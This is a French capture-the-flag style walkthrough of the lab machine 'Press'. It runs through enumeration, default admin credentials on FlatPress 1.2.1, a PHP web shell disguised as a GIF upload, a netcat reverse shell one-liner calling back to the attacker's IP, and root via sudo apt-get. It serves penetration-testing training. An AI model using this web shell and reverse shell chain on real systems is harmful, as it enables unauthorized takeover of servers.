# Press

`flatpress` `file upload`

* Nom machine : Press
* Difficulté : Intermédiaire
* OS : Linux

## Enumération

### NMAP

```
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-27 17:15 EDT
Nmap scan report for 192.168.208.29
Host is up (0.035s latency).
Not shown: 65532 closed tcp ports (conn-refused)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey: 
|   3072 c9:c3:da:15:28:3b:f1:f8:9a:36:df:4d:36:6b:a7:44 (RSA)
|   256 26:03:2b:f6:da:90:1d:1b:ec:8d:8f:8d:1e:7e:3d:6b (ECDSA)
|_  256 fb:43:b2:b0:19:2f:d3:f6:bc:aa:60:67:ab:c1:af:37 (ED25519)
80/tcp   open  http    Apache httpd 2.4.56 ((Debian))
|_http-server-header: Apache/2.4.56 (Debian)
|_http-title: Lugx Gaming Shop HTML5 Template
8089/tcp open  http    Apache httpd 2.4.56 ((Debian))
|_http-generator: FlatPress fp-1.2.1
|_http-title: FlatPress
|_http-server-header: Apache/2.4.56 (Debian)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

### HTTP (8089)

```
┌──(kali㉿kali)-[~/oscp/pyload]
└─$ dirsearch -u http://192.168.208.29:8089/
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js
HTTP method: GET | Threads: 25
Wordlist size: 11460

Output File: /home/kali/oscp/pyload/reports/http_192.168.208.29_8089/__24-08-27_17-17-11.txt

Target: http://192.168.208.29:8089/

[17:17:11] Starting: 
[17:17:13] 200 -  218B  - /.gitignore
[17:17:13] 403 -  281B  - /.ht_wsr.txt
[17:17:14] 403 -  281B  - /.htaccess.bak1
[17:17:14] 403 -  281B  - /.htaccess.orig
[17:17:14] 403 -  281B  - /.htaccess.sample
[17:17:14] 403 -  281B  - /.htaccess.save
[17:17:14] 403 -  281B  - /.htaccess_extra
[17:17:14] 403 -  281B  - /.htaccess_orig
[17:17:14] 403 -  281B  - /.htaccessBAK
[17:17:14] 403 -  281B  - /.htaccess_sc
[17:17:14] 403 -  281B  - /.htaccessOLD
[17:17:14] 403 -  281B  - /.htaccessOLD2
[17:17:14] 403 -  281B  - /.htm
[17:17:14] 403 -  281B  - /.html
[17:17:14] 403 -  281B  - /.htpasswd_test
[17:17:14] 403 -  281B  - /.htpasswds
[17:17:14] 403 -  281B  - /.httr-oauth
[17:17:14] 403 -  281B  - /.php
[17:17:17] 301 -  323B  - /admin  ->  http://192.168.208.29:8089/admin/
[17:17:17] 302 -    0B  - /admin.php  ->  http://192.168.208.29:8089/login.php
[17:17:17] 200 -  305B  - /admin/
[17:17:17] 200 -  305B  - /admin/index.php
[17:17:22] 200 -   10KB - /CHANGELOG.md
[17:17:23] 200 -    2KB - /contact.php
[17:17:24] 301 -  322B  - /docs  ->  http://192.168.208.29:8089/docs/
[17:17:24] 200 -  499B  - /docs/
[17:17:26] 404 -    5KB - /index.php/login/
[17:17:28] 200 -   18KB - /LICENSE.md
[17:17:28] 200 -    2KB - /login.php
[17:17:33] 200 -    2KB - /README.md
[17:17:34] 301 -    0B  - /rss.php  ->  http://192.168.208.29:8089/?x=feed:rss2&
[17:17:34] 200 -    3KB - /search.php
[17:17:34] 403 -  281B  - /server-status
[17:17:34] 403 -  281B  - /server-status/
[17:17:35] 200 -  305B  - /setup/
[17:17:35] 301 -  323B  - /setup  ->  http://192.168.208.29:8089/setup/
[17:17:36] 302 -    0B  - /static.php  ->  http://192.168.208.29:8089/
```

Le fichier /CHANGELOG.md nous fourni un numéro de version : Flatpress 1.2.1

Nous pouvons tenter de nous connecter en tant que admin:password

## Accès initial

### File Upload

{% embed url="<https://github.com/flatpressblog/flatpress/issues/152>" %}

```
┌──(kali㉿kali)-[~/oscp]
└─$ cat shellgif.php
GIF89a;
<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
    if(isset($_GET['cmd']))
    {
        system($_GET['cmd']);
    }
?>
</pre>
</body>
<script>document.getElementById("cmd").focus();</script>
</html>
```

<figure><img src="https://2731053407-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F1RXsXNh9elYzxZgW8W8f%2Fuploads%2FlIwTqSN9AMEGf9pShnmN%2Fea888ee010024e93c12b9fe949d91ba1-2.png?alt=media&#x26;token=9f3d6b16-a980-42ea-a28c-3e44a750a2f5" alt=""><figcaption></figcaption></figure>

`rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 192.168.45.224 1234 >/tmp/f`

```
┌──(kali㉿kali)-[~/oscp]
└─$ nc -lnvp 1234    
listening on [any] 1234 ...
connect to [192.168.45.224] from (UNKNOWN) [192.168.208.29] 60728
bash: cannot set terminal process group (601): Inappropriate ioctl for device
bash: no job control in this shell
www-data@debian:/var/www/flatpress/fp-content/attachs$ whoami
whoami
www-data
```

## Elévation des privilèges

```
www-data@debian:/home$ sudo -l
sudo -l
Matching Defaults entries for www-data on debian:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on debian:
    (ALL) NOPASSWD: /usr/bin/apt-get
```

{% embed url="<https://gtfobins.github.io/gtfobins/apt-get/#sudo>" %}

```
www-data@debian:/home$ sudo apt-get update -o APT::Update::Pre-Invoke::=/bin/sh
<apt-get update -o APT::Update::Pre-Invoke::=/bin/sh
whoami
root
```